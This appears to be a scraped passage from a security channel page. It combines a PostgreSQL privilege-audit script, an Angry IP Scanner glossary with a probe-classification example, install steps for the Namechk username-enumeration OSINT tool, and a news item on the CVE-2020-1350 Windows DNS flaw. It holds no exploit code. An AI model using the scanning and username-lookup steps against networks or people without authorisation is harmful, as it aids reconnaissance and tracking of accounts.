| | | | | postgres=CTc/postgres
template1 | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 | =c/postgres +
| | | | | postgres=CTc/postgres
(3 rows)
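The interesting column in the \l output above is "Access privileges", whose aclitem strings (=c/postgres, postgres=CTc/postgres) say who may connect to each database. The following added example (not from the original post) rebuilds the rows of that output, gluing the continuation lines that psql marks with a trailing '+', decodes each aclitem (empty grantee = PUBLIC, '*' = WITH GRANT OPTION, C/T/c = CREATE/TEMPORARY/CONNECT), and lists the databases PUBLIC can connect to; an empty ACL is reported too, since PostgreSQL's default database privileges grant PUBLIC CONNECT. The embedded table is the page's own output re-typed with psql's alignment.

```python
# The page's \l output, re-typed with psql's column alignment.
SAMPLE_OUTPUT = """\
                                  List of databases
   Name    |  Owner   | Encoding |   Collate   |    Ctype    |   Access privileges
-----------+----------+----------+-------------+-------------+-----------------------
 postgres  | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 |
 template0 | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | =c/postgres          +
           |          |          |             |             | postgres=CTc/postgres
 template1 | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | =c/postgres          +
           |          |          |             |             | postgres=CTc/postgres
(3 rows)
"""

# Privilege letters used in pg_database.datacl.
DATABASE_PRIVS = {"C": "CREATE", "T": "TEMPORARY", "c": "CONNECT"}


def parse_aclitem(item: str) -> dict:
    """Parse one aclitem such as 'postgres=CTc/postgres' or '=c/postgres'.
    An empty grantee means PUBLIC; '*' after a letter means WITH GRANT OPTION."""
    grantee_part, grantor = item.split("/", 1)
    grantee, letters = grantee_part.split("=", 1)
    privs, grantable = [], []
    i = 0
    while i < len(letters):
        name = DATABASE_PRIVS.get(letters[i], letters[i])
        privs.append(name)
        if i + 1 < len(letters) and letters[i + 1] == "*":
            grantable.append(name)
            i += 2
        else:
            i += 1
    return {"grantee": grantee or "PUBLIC", "privileges": privs,
            "with_grant_option": grantable, "grantor": grantor}


def parse_psql_list_output(text: str):
    """Rebuild the rows of `\\l`; the ACL column wraps onto extra lines that
    psql marks with a trailing '+', so those are appended to the previous row."""
    rows = []
    for line in text.splitlines():
        if "|" not in line:
            continue                                   # title, separator, row count
        cells = [c.strip() for c in line.split("|")]
        if cells[0] == "Name":
            continue                                   # header row
        acl = cells[-1].rstrip("+").strip()
        if cells[0] == "":                             # continuation of the ACL column
            if rows and acl:
                rows[-1]["acl"].append(acl)
            continue
        rows.append({"name": cells[0], "owner": cells[1], "acl": [acl] if acl else []})
    return rows


def public_connect(rows):
    """(database, reason) pairs for every database that PUBLIC may connect to."""
    out = []
    for row in rows:
        if not row["acl"]:
            out.append((row["name"], "default privileges"))   # defaults grant PUBLIC CONNECT
            continue
        for item in row["acl"]:
            parsed = parse_aclitem(item)
            if parsed["grantee"] == "PUBLIC" and "CONNECT" in parsed["privileges"]:
                out.append((row["name"], item))
    return out


if __name__ == "__main__":
    for name, why in public_connect(parse_psql_list_output(SAMPLE_OUTPUT)):
        print(f"{name}: PUBLIC can connect ({why})")
```

For a production cluster the usual follow-up is REVOKE CONNECT ON DATABASE ... FROM PUBLIC and explicit grants per role, after which the same script should report nothing but the template databases.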
Network Terms in Angry IP Scanner
Further tips from the program itself:
General information
Angry IP Scanner is a tool for scanning IP addresses.
It is used to scan IP addresses in order to find active hosts and collect interesting information about each of them.
You can start by specifying the IP addresses to scan (local IPs are entered by default) and clicking the "Start" button.
Key terms:
Feeder - Source of IP addresses for scanning. Angry IP Scanner provides various scanning sources: IP Range, IP List File or Random. You can select a source from the drop-down list next to the "Start" button
Data collector - collects specific information about the host, for example, ping time, host name, open ports. Collectors are usually columns as a result of a scan. They can be selected in the menu "Tools-> Data Collectors".
Active host - the host responding to ping. The results sheet is marked in blue.
Inactive host - a host that does not respond to ping (red). However, it may have open ports (if the firewall blocks ping). In order to fully scan such hosts, check the "Scan inactive" checkbox in Tools-> Preferences.
Open port - TCP port that responded to the connection attempt. Greens on the list.
Filtered port - TCP port, does not respond to the fact that it is closed (there is no RST packet). Probably these ports are specifically blocked by firewalls.
Pinging (host check):
Angry IP Scanner can use different ping methods. They can be selected in the "Preferences" window.
ICMP echo is the standard method used by the 'ping' program. On most platforms, requires administrator privileges. Some firewalls prohibit response packets to an ICMP request, making active hosts look inactive.
UDP - sends UDP packets (datagrams) to one of the host ports and monitors the response (whether or not). Not standard, but does not require privileges.
TCP - trying to connect to the 80 (http) port. UDP may work better for some networks, usually not.
Scanning UDP and TCP most often does not detect routers or other network equipment properly.
TTL (time to live) - this collector works only with ICMP ping. The initial value is usually 64 or 128, the difference shows the distance to the host in the number of nodes.
written by undercode
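To make the host and port categories above concrete, here is an added example (not part of the original post and not Angry IP Scanner's own code) that applies them to constructed probe results and estimates hop distance from an ICMP reply's TTL the way the TTL collector does; it generalizes the 64/128 rule by also allowing the 255 initial TTL common on routers.

```python
# Added example, not from the original post or from Angry IP Scanner: apply the
# scanner's categories (active/inactive host, open/filtered port) to raw probe
# results and estimate hop distance from the TTL of an ICMP echo reply.
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Common initial TTLs: 64 (Linux/BSD/macOS), 128 (Windows), 255 (many routers
# and appliances). Each router on the path decrements the TTL by one.
INITIAL_TTLS = (64, 128, 255)


def estimate_hops(observed_ttl: int) -> Tuple[int, int]:
    """Return (assumed initial TTL, hop count) for an ICMP reply's TTL."""
    if not 1 <= observed_ttl <= 255:
        raise ValueError("TTL must be in 1..255")
    initial = next(t for t in INITIAL_TTLS if t >= observed_ttl)
    return initial, initial - observed_ttl


@dataclass
class ProbeResult:
    ip: str
    ping_reply: bool                  # did the chosen ping method get an answer
    ttl: Optional[int] = None         # only known for ICMP echo replies
    # port -> "open" (connection accepted), "closed" (RST) or "filtered" (no answer)
    ports: Dict[int, str] = field(default_factory=dict)


def classify_host(r: ProbeResult, scan_inactive: bool = False) -> dict:
    """Apply the scanner's categories: active (blue) / inactive (red).
    Ports of an inactive host are only known when 'Scan inactive' is on."""
    open_ports = sorted(p for p, s in r.ports.items() if s == "open")
    filtered = sorted(p for p, s in r.ports.items() if s == "filtered")
    if r.ping_reply:
        state = "active"
    elif not scan_inactive:
        state, open_ports, filtered = "inactive", [], []   # never port-scanned
    elif open_ports:
        state = "inactive (ping blocked, but listening)"
    else:
        state = "inactive"
    hops = estimate_hops(r.ttl)[1] if r.ttl is not None else None
    return {"ip": r.ip, "state": state, "open": open_ports,
            "filtered": filtered, "hops": hops}


# Constructed sample results (not real scan data).
SAMPLE: List[ProbeResult] = [
    ProbeResult("192.168.50.10", True, ttl=61, ports={22: "open", 80: "closed"}),
    ProbeResult("192.168.50.11", False, ports={443: "open", 3389: "filtered"}),
]
```

Call classify_host(rec, scan_inactive=True) on each SAMPLE entry to see the second host reported as inactive-but-listening instead of simply inactive.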
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦OSINT tool based on namechk.com for checking usernames on more than 100 websites, forums and social networks
Termux / Linux
Installation & run:
1) git clone https://github.com/HA71/Namechk.git
2) cd Namechk
3) Search for an available username: ./namechk.sh <username> -au
4) Search for an available username on specific websites: ./namechk.sh <username> -au -co
5) Search for available usernames from a list: ./namechk.sh -l -au
6) Search for a used username: ./namechk.sh <username> -fu
7) Search for a used username on specific websites: ./namechk.sh <username> -fu -co
8) Search for used usernames from a list: ./namechk.sh -l -fu
ENJOY
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
GitHub - GONZOsint/Namechk: Osint tool based on namechk.com for checking usernames on more than 100 websites, forums and social networks.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Microsoft warns of major vulnerabilities in Windows DNS server
#News
> Microsoft warned that a critical vulnerability in Windows DNS Server, which has existed for 17 years, is classified as "wormable." Such vulnerabilities may allow attackers to create special malware, execute code remotely on Windows servers, and create malicious DNS queries, which may eventually lead to the intrusion of infrastructure in enterprises and key departments.
> Visit the MSRC report:
https://msrc-blog.microsoft.com/2020/07/14/july-2020-security-update-cve-2020-1350-vulnerability-in-windows-domain-name-system-dns-server/
> "Wormable vulnerabilities can spread through vulnerable software without user interaction," explains Mechele Gruhn, Microsoft's chief security project manager. "Windows DNS server is a core network component. Although it is not known whether this vulnerability is used for active attacks, customers must apply Windows updates as soon as possible to resolve this vulnerability."
> Researchers at Check Point discovered a security vulnerability in Windows DNS and reported it to Microsoft in May. If the patch is not applied, it will make the Windows server vulnerable to attacks, but Microsoft pointed out that there is no evidence of this flaw being used.
> Today, all supported versions of Windows Server provide patches to fix the vulnerability, but system administrators must patch the server as soon as possible before malicious actors create malware based on the vulnerability.
> "DNS server vulnerability is a very serious matter," Omri Herscovici, the head of Check Point's vulnerability research team, warned. "Only a few of these types of vulnerabilities have been published. Every organization that uses Microsoft infrastructure, regardless of size, will face significant security risks if they do not apply patches. The worst consequence will be the complete destruction of the entire enterprise network. Microsoft's code has been in existence for more than 17 years; since we can find this vulnerability, it is not impossible for others to have discovered this vulnerability."
> Windows 10 and other client versions of Windows are not affected by this vulnerability, because it only affects Microsoft's Windows DNS Server implementation. Microsoft has also released a registry-based workaround so that administrators can address the flaw when they cannot patch servers quickly.
> Microsoft gave a maximum risk score of 10 on the Common Vulnerability Scoring System (CVSS), emphasizing the severity of the problem. In contrast, the vulnerability used in the WannaCry attack scored 8.5 on CVSS.
ENJOY
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
July 2020 Security Update: CVE-2020-1350 Vulnerability in Windows Domain Name System (DNS) Server | MSRC Blog | Microsoft
Today we released an update for CVE-2020-1350, a Critical Remote Code Execution (RCE) vulnerability in Windows DNS Server that is classified as a "wormable" vulnerability and has a CVSS base score of 10.0. This issue results from a flaw in Microsoft's DNS…